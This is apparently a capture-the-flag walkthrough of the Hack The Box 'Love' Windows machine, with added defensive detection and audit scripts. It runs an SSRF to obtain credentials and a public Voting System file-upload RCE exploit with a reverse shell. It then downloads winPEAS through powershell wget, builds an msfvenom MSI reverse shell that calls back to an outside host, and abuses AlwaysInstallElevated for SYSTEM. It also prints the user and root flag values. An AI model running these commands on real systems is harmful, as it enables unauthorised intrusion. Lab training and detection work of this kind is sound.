HTB Love done
Love
OS:
Windows
Technology:
IP Address:
10.129.159.190
Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Users and passwords:
L: admin
P: @LoveIsInTheAir!!!!
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.159.190_nmap 10.129.159.190 ; cat IP_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 14:20 CET
Nmap scan report for 10.129.159.190
Host is up (0.035s latency).
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, HTTPOptions, LDAPSearchReq, RPCCheck, RTSPRequest, TLSSessionReq, WMSRequest, oracle-tns:
|_ Host '10.10.14.65' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2025-01-13T13:52:10+00:00; +21m32s from scanner time.
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Ffuf
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ ffuf -u http://10.129.159.190/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.129.159.190_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.asp,.aspx
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.159.190/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .asp .aspx
:: Output file : 10.129.159.190_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 32ms]
Admin [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 35ms]
Home.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
Images [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 36ms]
Index.php [Status: 200, Size: 4388, Words: 654, Lines: 126, Duration: 39ms]
Login.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
admin [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 36ms]
dist [Status: 301, Size: 340, Words: 22, Lines: 10, Duration: 36ms]
home.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
images [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 36ms]
includes [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 32ms]
index.php [Status: 200, Size: 4388, Words: 654, Lines: 126, Duration: 34ms]
licenses [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 34ms]
login.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
plugins [Status: 301, Size: 343, Words: 22, Lines: 10, Duration: 38ms]
preview.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
server-info [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 37ms]
server-status [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 34ms]
tcpdf [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 1207ms]
:: Progress: [184221/184221] :: Job [1/1] :: 1197 req/sec :: Duration: [0:03:23] :: Errors: 0 ::
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ cat /etc/hosts | grep love
10.129.159.190 staging.love.htb love.htb
Open website: http://staging.love.htb/beta.php
I found an SSRF vulnerability
Check localhost on port 5000
http://localhost:5000
I found credentials for the user admin:
L: admin
P: @LoveIsInTheAir!!!!
Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
[Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)](https://www.exploit-db.com/exploits/49445)
Edit exploit
Modify settings and URL
---
# --- Edit your settings here ----
IP = "10.129.159.190" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.65" # Reverse shell IP
REV_PORT = "80" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
Run exploit - revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 49445.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.159.190] 61422
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>
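From the defender's side, the chain above leaves a clear trace in the Apache access log: a POST to /admin/voters_add.php followed by the same client requesting a .php file from /images/. The following detection script is an added example, not part of this writeup or of the Voting System project; the log lines are constructed to mirror the chain, and the combined log format is assumed.

```python
import re
from collections import defaultdict

# Apache combined log format, as written by the XAMPP httpd on this host (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Endpoint the public exploit posts the PHP file to, and the directory it is then served from.
UPLOAD_ENDPOINT = "/admin/voters_add.php"
SCRIPT_IN_UPLOAD_DIR = re.compile(r"^/images/[^/?]+\.ph(p\d?|tml|ar)(\?.*)?$", re.I)

def parse_line(line):
    """Split one access-log line into its fields; return None for malformed lines."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), status=int(m["status"])) if m else None

def detect_upload_chain(lines):
    """Flag every request for a script inside the image upload directory. Severity is
    'high' when the same client earlier POSTed to the uploader (full chain visible),
    otherwise 'medium' (a script in /images/ should never be requested at all)."""
    uploads = defaultdict(int)          # client IP -> number of POSTs to the uploader
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] == UPLOAD_ENDPOINT:
            uploads[rec["ip"]] += 1
        elif SCRIPT_IN_UPLOAD_DIR.match(rec["path"]):
            findings.append({
                "ip": rec["ip"], "time": rec["ts"], "path": rec["path"],
                "status": rec["status"],
                "severity": "high" if uploads[rec["ip"]] else "medium",
            })
    return findings

# Constructed sample log (not captured from the box); the 10.10.14.65 client mirrors the
# exploit: log in, upload via voters_add.php, then trigger /images/shell.php.
SAMPLE_LOG = """\
10.10.14.65 - - [13/Jan/2025:15:20:01 +0100] "GET /admin/login.php HTTP/1.1" 200 1843
10.10.14.65 - - [13/Jan/2025:15:20:01 +0100] "POST /admin/login.php HTTP/1.1" 302 0
10.10.14.65 - - [13/Jan/2025:15:20:02 +0100] "POST /admin/voters_add.php HTTP/1.1" 200 512
10.10.14.65 - - [13/Jan/2025:15:20:03 +0100] "GET /images/shell.php HTTP/1.1" 200 0
10.10.14.20 - - [13/Jan/2025:15:21:00 +0100] "GET /images/logo.png HTTP/1.1" 200 9120
10.10.14.20 - - [13/Jan/2025:15:21:30 +0100] "GET /images/cmd.phtml?x=1 HTTP/1.1" 404 0
"""
if __name__ == "__main__":
    for finding in detect_upload_chain(SAMPLE_LOG.splitlines()):
        print(finding)
```

The same signal can be closed at the source by denying PHP execution in the upload directory in the Apache configuration, so that a request for /images/shell.php returns the file's bytes instead of running them.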
Read flag: user.txt
C:\xampp\htdocs\omrs\images>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users
04/13/2021 05:58 AM <DIR> .
04/13/2021 05:58 AM <DIR> ..
04/12/2021 02:00 PM <DIR> Administrator
04/21/2021 06:01 AM <DIR> Phoebe
04/12/2021 01:10 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,948,240,896 bytes free
C:\Users>cd Phoebe
cd Phoebe
C:\Users\Phoebe>cd Desktop
cd Desktop
C:\Users\Phoebe\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/13/2025 05:35 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,948,240,896 bytes free
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
db324de3751981f74f50d2d7f5e592c2
C:\Users\Phoebe\Desktop>
WinPEAS
https://github.com/peass-ng/PEASS-ng/releases/tag/20250113-4426d62e
Upload to remote host
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.159.190 - - [13/Jan/2025 15:35:52] "GET /winPEASx64.exe HTTP/1.1" 200 -
---
C:\Users\Phoebe\Desktop>powershell wget http://10.10.14.65/winPEASx64.exe -outfile wp.exe
powershell wget http://10.10.14.65/winPEASx64.exe -outfile wp.exe
Download report: out.txt
C:\Users\Phoebe\Desktop>wp.exe log
wp.exe log
"log" argument present, redirecting output to file "out.txt"
C:\Users\Phoebe\Desktop>copy out.txt C:\xampp\htdocs\omrs\images\out.txt
copy out.txt C:\xampp\htdocs\omrs\images\out.txt
1 file(s) copied.
C:\Users\Phoebe\Desktop>
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ wget http://love.htb/images/out.txt
--2025-01-13 15:42:34-- http://love.htb/images/out.txt
Resolving love.htb (love.htb)... 10.129.159.190
Connecting to love.htb (love.htb)|10.129.159.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 164108 (160K) [text/plain]
Saving to: ‘out.txt’
out.txt 100%[==============================================>] 160.26K --.-KB/s in 0.1s
2025-01-13 15:42:35 (1.14 MB/s) - ‘out.txt’ saved [164108/164108]
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ file out.txt
out.txt: Unicode text, UTF-8 text, with very long lines (712), with CRLF, LF line terminators, with escape sequences, with overstriking
Read report - AlwaysInstallElevated
╔══════════╣ Checking AlwaysInstallElevated
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
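The two winPEAS lines above are the whole finding: msiexec installs a per-user package as SYSTEM only when AlwaysInstallElevated is 1 in both HKLM and HKCU, so an audit has to read both hives. The script below is an added example (not part of the writeup or of winPEAS) that parses `reg query` output for each hive, decides whether the elevation path is open, and emits the `reg add` commands that reset the policy; the sample outputs are constructed to mirror the state reported on this host.

```python
import re

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"

# Shape of `reg query <hive>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`.
# Both samples are constructed; they reproduce the "1 in HKLM, 1 in HKCU" state winPEAS reported.
SAMPLE_HKLM = f"""
HKEY_LOCAL_MACHINE\\{INSTALLER_KEY}
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = f"""
HKEY_CURRENT_USER\\{INSTALLER_KEY}
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# What reg query prints when the policy was never configured, which is the secure default.
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", re.M)

def parse_always_install_elevated(reg_output):
    """Return the policy DWORD as an int, or None when the value is not present."""
    m = VALUE_RE.search(reg_output)
    return int(m.group(1), 0) if m else None

def assess(hklm_output, hkcu_output):
    """Combine both hives. The install runs as SYSTEM only when BOTH values are 1;
    a single hive set to 1 is still a misconfiguration worth resetting, but on its
    own it does not let a standard user elevate."""
    hklm = parse_always_install_elevated(hklm_output)
    hkcu = parse_always_install_elevated(hkcu_output)
    remediation = [
        f"reg add {hive}\\{INSTALLER_KEY} /v AlwaysInstallElevated /t REG_DWORD /d 0 /f"
        for hive, value in (("HKLM", hklm), ("HKCU", hkcu)) if value == 1
    ]
    return {
        "hklm": hklm,
        "hkcu": hkcu,
        "vulnerable": hklm == 1 and hkcu == 1,
        "remediation": remediation,
    }

if __name__ == "__main__":
    print(assess(SAMPLE_HKLM, SAMPLE_HKCU))
    print(assess(SAMPLE_HKLM, SAMPLE_MISSING))
```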
Upload payload - revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.65 LPORT=443 -f msi -o revshell.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: revshell.msi
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.159.190 - - [13/Jan/2025 15:58:52] "GET /revshell.msi HTTP/1.1" 200 -
---
C:\Users\Phoebe\Desktop>powershell wget http://10.10.14.65/revshell.msi -outfile revshell.msi
powershell wget http://10.10.14.65/revshell.msi -outfile revshell.msi
Run revshell
C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i revshell.msi
msiexec /quiet /qn /i revshell.msi
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.159.190] 61425
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
Read flag: root.txt
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Administrator\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/13/2025 05:35 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,936,100,352 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d7784d4bf58c945847705c6d9a9557de
C:\Users\Administrator\Desktop>
References
[Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)](https://www.exploit-db.com/exploits/49445)
Lessons Learned